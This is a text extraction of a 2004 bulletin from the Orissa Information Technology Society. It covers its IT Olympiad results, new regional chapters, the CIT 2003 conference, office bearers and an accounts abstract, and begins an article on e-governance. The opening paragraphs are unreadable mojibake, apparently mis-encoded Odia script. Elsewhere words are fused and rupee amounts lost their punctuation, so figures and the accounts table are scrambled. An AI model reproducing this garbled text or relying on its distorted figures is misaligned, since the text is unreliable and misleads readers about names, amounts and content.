[`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 2: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

Chief EditorJyotiranjan SahuPresident OITS

EditorSK Pradhan

Secretary OITS

Executive EditorJyotiranjan Hota

OITS

Editorial BoardSP Misra

Sudarsan PadhyLaxman Mohanty

Chitta BaralHrushikesh MohantyArun Kumar Pujari

Jyotiranjan Hota

OITS Bulletin

PREFACE

In one of the meetings of Orissa Information Technology Society (OITS)the executive committee decided to bring out a bulletin OITS Bulletin to bereleased once a year preferably at the time of CITs We had invited popularand semi-technical articles from different authors and released the first Bulletinas an humble beginning during December 2003 It was further decided by thecommittee to publish the Bulletin during June and December of each year Wecould not publish the June issue of the Bulletin due to lack of sufficient articlesWe hope more participation from OITS members in future

Jyotiranjan Sahu Satish Pradhan Jyotiranjan HotaChief Editor Editor Executive Editor

CONTENTS

1 Activities of OITS 2003-2004 SP Misra 1

2 The Transition from Physical Governance Raj Kumar Prasad 9to e-Governance

3 Application of Data Fusion in Computer Sateesh Pradhan ampForensics Suneeta Satpathy 16

4 Interesting Patterns in CITs A Misra 21

5 Experiences amp Learning from Organisingan International Conference in aDeveloping Country Laxman Mohanty 25

6 Guiding Seminars and Projects forUndergraduate Engineering Students M N Das 29

7 Case study on ICT and e-Gov Krishnan V D G 32Quarterly Progress Report (April-June 2003)

8 Known Malware Exploitation Abhishek Bhuyan 37

9 LOtilde EcircOcircVethornethorn S_ecirc J aTHORNLETHh OgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH 41

Orissa Information Technology Society(OITS)

From April 2003 to March 2004

A Orissa Information Technology Olympiad(Held on 7th September 2003 )

Orissa Information Technology Society(OITS) conducted the annual quiz test at senior(MCA BE BSc(Eng) and BSc(hons)) and junior(upto class XII) levels with separate questionson 7th September 2003 The test to be held onthe last sunday of august or the first sunday ofseptember was originally scheduled to be on31st august but was shifted by a week as ganeshpuja was there on that day We contactedBerhampur Puri SambalpurBurla RourkelaSarang Cuttack Raygada Balasore DamanjodiParadeep Angul and Bhubaneswar About 1200students registered for the same and aroundeleven hundred students appeared This yearthere was a very positive response from RourkelaSambalpurBurla Raygada and Balasore andsome other places as additional venues ProfSudarshan Padhy Coordinator IT Olympiadmainly organised this activity and he was ablyassisted by many volunteers including MTech(Comp Sc) students (they were not eligible tocontest) and young faculty members The resultsat senior and junior levels are as below

The first three rank holders in the seniorlevel were

1 Puspita Ray IMCA 9th Semester (Utkal Un)

2 Parthasarathi Dash Un College of Eng BE(cs) 7th Semester (burla)

Activities of OITS 2003-2004

SP Misra

3 Geeta Mohanty MCA 2nd Semester (KIIT bbs)

The first three rank holders in the juniorlevel were

1 Bagdevi Panda Class XII DAV Public SchoolCDA Cuttack

2 Siladitya Mohapatra Class X St Paul SchoolRourkela

3 Amulya Ratna Dash Class X BlessedSacrament High School Puri

Names of the other rank holders may beseen in the appropriate website

B Orissa IT Olympiad Prize Distribution held on 18th january 2004

The IT olympiad prize distribution functionwas held on 18th January 2004 at 230 pm TheChief Guest was Bikramjit Maitra Head InfosysCentre at Bhubaneswar and the guest of honourwas Gautam Parija administrative head InfosysCentre Bhubaneswar Arun SamantarayAdministrator Utkal University presided overthe function All the prize winners along withtheir teachers were invited to the function Alsothe parents of the prize winners at junior levelwere separetely invited There were altogetherabout 70 to 80 participants

The president of oits S P Misra welcomedthe participants Next Sudarshan PadhyCoordinator IT olympiad program spoke aboutthe conduct of the olympiad examination andreferred to the fact that on this occasion therewere about nineteen centres in which thestudents appeared spread all over Orissa

OITS-2004

1

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

intelligence The Secretary Dr B Patel talkedabout the interesting programs that were thereduring cit2003 and also about the futureprograms of the sambalpur chapter PrincipalG M College was the guest of honour and S PMisra president oits presided over the functionProf Pujari had also given a technical talk beforethe inauguration meeting

The chapter began with a seed money ofRs10800+Rs8000 with the first being from theregistration fees of fourteen members and thesecond being a donation by S P Misra as he hada speial attachment to sambalpur as his fatherProf Narayan Misra was the first principal ofGM College which was the beginning of highereducation in that area The name of the accountof sambalpur chapter is oits-sbp

The Secretary has subsequently intimatedthat the following are the office bearers of thechapter

1 President Prof S K Sanyal PrincipalUCE Burla

2 Vice-President Prof C R TripathyUCE Burla

3 Secretary Dr B Patel G M CollegeSambalpur

4 Treasurer Dr A P Dash G M CollegeSambalpur

D WORKSHOP ON PARALLEL COMPUTING AND BIOINFORMATICS

Organised by sambalpur chapter

22nd and 23rd March 2004

Here 141 delegates had registered for theworkshop Out of them there were 10 lifemembers of OIT-sbp 13 faculties from nearbycolleges rest being students from differentbranches like MCA Engnieering Msc comp scPhysics Mathematics Botany and Life Sciences

Professor Sudarsan Padhy UtkalUniversity Vanivihar delivered talks on parallelcomputing in three different sessions

On 220304 in the first session heillustrated the same through different exampleslike weather forecasting image processing etcemphasizing the importance of ParallelAlogorithms over serial Algorithms and takingdifferent examples developed the problems onParallel Algorithm In the second Session somemore developements in the problems of parallelalogorithms with multiprogramming and multiprocessing systems were considered

The uniqueness in the workshop waspractical demonstrations as needed Ajit kumarNayak Silicon Institute of TechnologyBhubaneswar demonstrated in two differentsessions about clustering of different workstations through Linux with the syntax to writeprograms using MPI The programmes weredemonstrated to the students This approachcreates a lot of interest among the students forthe problems of parallel algorithms

There were Two Tea Breaks and One lunchbreak for all the delegates

On 230304 Professor Padhy developed theproblems of parallel algorithms and proved theresults

Ajit Kumar Nayak demonstrated moreprograms of parallel algorithms to the delegates

In the after noon session Prof Padhydelivered a talk on Bio-Informatics which wasfollowed by another talk from Prof APDashGMCollege There were two Tea Breaks and onelunch for all the delegates

A feed back Form were circulated to alldeligates and their views were collected whichwas enthusiastic and positive

OITS-2004

4

The main feature of this workshop was itsmultidisciplinary nature with the delegates alsobelonging to diverse disciplines

E Opening of ROURKELA CHAPTER

In late december 2003 a letter was receivedfrom Prof Sourya Patnaik director rourkelainstitute of management studies (rims) with alist of ten new members from rims along with arequest to open a chapter of oits at rourkela TheInstitute was rated as among the top 40 B-schools and had MCA programs along withbusiness school programs We already had quitea few oits members in nit rourkela and it wasthought that such chapter shall be serving theaims and objectives of oits for the spread of ITin orissa

S Patnaik and sreekumar both of rims actedas convenors of the chapter They furtherrequested that they already had a program forfaculty improvement scheduled for 8th January2004 and it would be nice to inaugurate therourkela chapter of oits then with the facultyimprovement program being the first functionunder its auspices However as per rules oitsexecutive committee needs to approve theopening of a chapter for which time was notavailable Since opening of this chapter wastotally parallel to the opening of the sambalpurchapter the president rang up some executivecommittee members and with their approvalintimated Prof Patnaik that we may do so

The chapter was inaugurated on 8thjanuary 2004 by again Prof M C Dash vice-chancellor sambalpur university The functionwas attended by the president oits whowelcomed the delegates by Prof S Padhy whospoke about IT and oits Prof G Panda whoelaborated on many aspects of IT to emphasizethat IT is so interdisciplinary that it could hardly

be regarded as an independent subject ProfSourya Patnaik presided over the function andintimated that they had requested Prof Panda ofNIT Rourkela to be the president of the chapterand he had kindly agreed

One thing about Prof Pandas talkparticularly impressed me He said that he cantrain computer students to be self-reliant andthrough software development through thistraining earn their own livelihood at acomfortable level I do hope that through hisleadership this will come to happen in whichcase rourkela chapter will lead oits and all ITlovers about a very positive action

The afternoon programe was devoted to theworkshop on financial computation where anexpert from finance introduced the subject andProf Padhy talked about the computationalmodelling of the corresponding theories It wasattended by more than twenty-five participantsspread from different colleges in orissa It is verywell known that economic models have becomehighly mathematical and with the need for wide-scale data bases computational finance isbecoming a very important area of IT

The executive committee of oits met on1212004 where it discusssed about the openingof the rourkela chapter and approved the same

Rourkela chapter started with the seedmoney of Rs11210+Rs8000 the first abovebeing the money transferred from oitsmembership fees and the second being adonation by S P Misra who was Professor at(then) REC Rourkela for ten years He alsothought that the amount should be reasonablesince as per rules at least half of the aboveamount shall be kept as fixed deposit By theway this fixed deposit gives some stability tothe chapters where generally the members shall

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

